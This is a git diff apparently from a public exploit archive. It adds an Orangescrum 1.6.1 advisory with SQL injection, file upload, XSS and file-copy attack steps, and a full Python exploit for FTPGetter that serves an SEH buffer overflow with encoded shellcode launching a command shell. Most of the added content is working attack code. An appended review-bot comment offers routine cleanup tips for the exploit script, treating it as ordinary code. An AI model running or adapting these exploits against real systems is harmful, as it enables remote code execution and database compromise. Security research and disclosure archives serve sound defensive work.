diff --git a/files.csv b/files.csv
index 992dcebfe..7ed0f9397 100644
--- a/files.csv
+++ b/files.csv
@@ -15695,6 +15695,7 @@ id,file,description,date,author,platform,type,port
 42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0
 42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0
 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
+42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38138,3 +38139,4 @@ id,file,description,date,author,platform,type,port
 42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0
 42324,platforms/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps,0
 42326,platforms/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps,0
+42330,platforms/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps,0
diff --git a/platforms/php/webapps/42330.txt b/platforms/php/webapps/42330.txt
new file mode 100755
index 000000000..b0f0fe18b
--- /dev/null
+++ b/platforms/php/webapps/42330.txt 
@@ -0,0 +1,39 @@
+# Exploit Title: [Orangescrum 1.6.1 Multiple Vulnerabilities]
+# Google Dork: [NA]
+# Date: [July 9 2017]
+# Exploit Author: [tomplixsee@yahoo.co.id]
+# Author blog : [cupuzone.wordpress.com]
+# Vendor Homepage: [https://www.orangescrum.org/]
+# Software Link: [https://www.orangescrum.org/free-download]
+# Version: [1.6.1]
+# Tested on: [Ubuntu 16.04]
+# CVE : [NA]
+
+Orangescrum is one of task management software written in PHP.
+
+Its version 1.6.1 have multiple vulnerabilities. To exploit all of them, you have to log in first.
+
+1. Arbitrary File Upload
+Create or reply task. Then upload a file. The file will be uploaded into directory app/webroot/files/case_files, without any validation.
+It then can be accessed from url http://yourorangescrum/app/webroot/files/case_files/thefile
+
+2. SQL Injection (time based)
+Send a POST request to http://yourorangescrum/easycases/ajax_change_AssignTo , with POST variables caseId and assignId.
+For example in python:
+url = "http://yourorangescrum/easycases/ajax_change_AssignTo"
+data = {"caseId":"1' AND SLEEP(5) AND 1='1","assignId":"1"}
+headers = {
+ 'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Cookie': yourcookie
+}
+
+3. XSS (stored)
+Reply a task (choose html editor). Put your XSS code there. example
+
+4. 
Arbitrary File Copy
+Look at an image profile url, it is something like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100
+To copy add variable dest, so it will be like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100&dest=hacked.php
+It will copy file a6ebd6bd62ba537f37b7b8ac40aa626d.png into hacked.php that will be stored in users/image_thumb/hacked.php
+Conditions :
+- variable sizex and sizey must be the real width and height of file a6ebd6bd62ba537f37b7b8ac40aa626d.png (in this example)
diff --git a/platforms/windows/remote/42328.py b/platforms/windows/remote/42328.py
new file mode 100755
index 000000000..f5972b4ab
--- /dev/null
+++ b/platforms/windows/remote/42328.py
@@ -0,0 +1,101 @@
+#!/usr/bin/python
+
+# Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow
+# Date: 07/14/2017
+# Exploit Author: Paul Purcell
+# Contact: ptpxploit at gmail
+# Vendor Homepage: https://www.ftpgetter.com/
+# Vulnerable Version Download: Available for 30 days here: (https://ufile.io/2celn) I can upload again upon request
+# Version: FTPGetter 5.89.0.85 (also works on earlier versions)
+# Tested on: Windows 10 Pro 1703 x64
+# Youtube Demonstration of Exploit: https://www.youtube.com/watch?v=AuAiQwGP-ww
+# Category: Remote Code Execution
+#
+# Timeline: 05/25/16 Bug found
+# 05/31/16 Vender notified - no response
+# 07/15/16 Vender notified - no response
+# -------- Vender notified multiple times over a year, no response.
+# 07/14/17 Exploit Published
+#
+# Summary: There is a buffer overflow in the log viewer/parser of FTPGetter. When a malicious ftp server returns a long
+# 331 response, the overflow overwrites SEH produced is exploitable. There are many bad characters, so I had to ascii encode everything.
+# My PoC runs code to launch a command shell. Also note the time of day is displayed in the log viewer, which will
+# change the length of the buffer needed. Just adjust your sled accordingly.
+
+from socket import *
+
+#ascii encoded launch cmd.exe
+buf = ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x4b\x4c\x6b\x58\x4f\x72\x67\x70\x43\x30\x55\x50\x33"
+buf += "\x50\x4f\x79\x4a\x45\x44\x71\x4f\x30\x71\x74\x6c\x4b"
+buf += "\x70\x50\x34\x70\x4e\x6b\x61\x42\x54\x4c\x4c\x4b\x42"
+buf += "\x72\x47\x64\x4e\x6b\x64\x32\x44\x68\x36\x6f\x4c\x77"
+buf += "\x42\x6a\x46\x46\x30\x31\x4b\x4f\x4c\x6c\x57\x4c\x31"
+buf += "\x71\x63\x4c\x44\x42\x64\x6c\x35\x70\x7a\x61\x38\x4f"
+buf += "\x56\x6d\x55\x51\x6f\x37\x38\x62\x4c\x32\x61\x42\x52"
+buf += "\x77\x4c\x4b\x51\x42\x32\x30\x6e\x6b\x50\x4a\x77\x4c"
+buf += "\x4e\x6b\x42\x6c\x34\x51\x44\x38\x68\x63\x32\x68\x66"
+buf += "\x61\x58\x51\x62\x71\x6c\x4b\x76\x39\x35\x70\x35\x51"
+buf += "\x49\x43\x4e\x6b\x37\x39\x67\x68\x68\x63\x55\x6a\x72"
+buf += "\x69\x4c\x4b\x64\x74\x4e\x6b\x65\x51\x5a\x76\x35\x61"
+buf += "\x69\x6f\x4c\x6c\x6b\x71\x78\x4f\x54\x4d\x57\x71\x39"
+buf += "\x57\x46\x58\x79\x70\x51\x65\x4c\x36\x67\x73\x51\x6d"
+buf += "\x38\x78\x67\x4b\x73\x4d\x64\x64\x32\x55\x39\x74\x56"
+buf += "\x38\x4c\x4b\x62\x78\x54\x64\x37\x71\x79\x43\x75\x36"
+buf += "\x4e\x6b\x46\x6c\x42\x6b\x4e\x6b\x56\x38\x47\x6c\x46"
+buf += "\x61\x5a\x73\x6c\x4b\x45\x54\x4c\x4b\x33\x31\x48\x50"
+buf += "\x4c\x49\x73\x74\x44\x64\x44\x64\x33\x6b\x53\x6b\x50"
+buf += "\x61\x73\x69\x63\x6a\x62\x71\x59\x6f\x6b\x50\x53\x6f"
+buf += "\x51\x4f\x32\x7a\x4e\x6b\x72\x32\x7a\x4b\x4e\x6d\x31"
+buf += "\x4d\x52\x4a\x35\x51\x4c\x4d\x4c\x45\x38\x32\x67\x70"
+buf += "\x63\x30\x53\x30\x66\x30\x75\x38\x36\x51\x6e\x6b\x52"
+buf += "\x4f\x4f\x77\x39\x6f\x4b\x65\x4d\x6b\x6a\x50\x4f\x45"
+buf += "\x4f\x52\x30\x56\x42\x48\x6e\x46\x6f\x65\x6f\x4d\x6d"
+buf += "\x4d\x49\x6f\x7a\x75\x45\x6c\x73\x36\x51\x6c\x37\x7a"
+buf += 
"\x4b\x30\x39\x6b\x39\x70\x30\x75\x76\x65\x6d\x6b\x72"
+buf += "\x67\x32\x33\x52\x52\x62\x4f\x51\x7a\x75\x50\x76\x33"
+buf += "\x79\x6f\x4b\x65\x55\x33\x62\x4d\x72\x44\x34\x6e\x53"
+buf += "\x55\x43\x48\x61\x75\x57\x70\x41\x41"
+
+#All the normal ways to jump back to code I control code were bad characters, so again had to ascii encode
+jmpback = ""
+jmpback += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+jmpback += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+jmpback += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+jmpback += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+jmpback += "\x4e\x6d\x4d\x6e\x46\x70\x49\x6e\x6b\x4f\x4b\x4f\x49"
+jmpback += "\x6f\x6a\x47\x41\x41"
+
+host = "0.0.0.0"
+port = 21
+
+sled="NjoyUrShell!"
+fill="\x41"*(480-len(buf))
+nseh="\x74\x06\x90\x90"
+seh="\xad\x11\x4d\x00"
+prepesi="\x58\x58\x58\x8d\x70\x10\x90\x90"
+jnk="B"*400
+sploit=(sled+buf+fill+nseh+seh+prepesi+jmpback+jnk)
+sock = socket(AF_INET, SOCK_STREAM)
+sock.bind((host, 21))
+sock.listen(1)
+
+
+print "Anti-FtpGetter FTP Server Started!"
+print "Ready to pwn on port %d..." % port
+
+connect, hostip = sock.accept()
+print "Connection accepted from %s" % hostip[0]
+connect.send("220 Welcome to pwnServ, Serving sploit in 3..2..1..\r\n")
+connect.recv(64) # Receive USER
+print "Sending EViL 331 response"
+connect.send("331 "+sploit+"\r\n")
+print "Here, have a handy dandy command shell!"
+connect.close()
+sock.close()
+
+
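Review bot: `sock.bind((host, 21))` hardcodes the port while the `port` variable defined a few lines above is only used in the "Ready to pwn on port %d" message, so editing `port` would silently desynchronize the listener from what the script reports; `sock.bind((host, port))` keeps the two in step. The listening socket and the accepted connection are also only closed on the straight-line path — if `accept()`, `recv()` or either `send()` raises, neither `connect.close()` nor `sock.close()` runs and the bound port is held until the interpreter exits — so a `try`/`finally` around the accept-and-send sequence would release both reliably. Both points are PoC hygiene in a flat script with no function boundaries; the hunk covers the whole file.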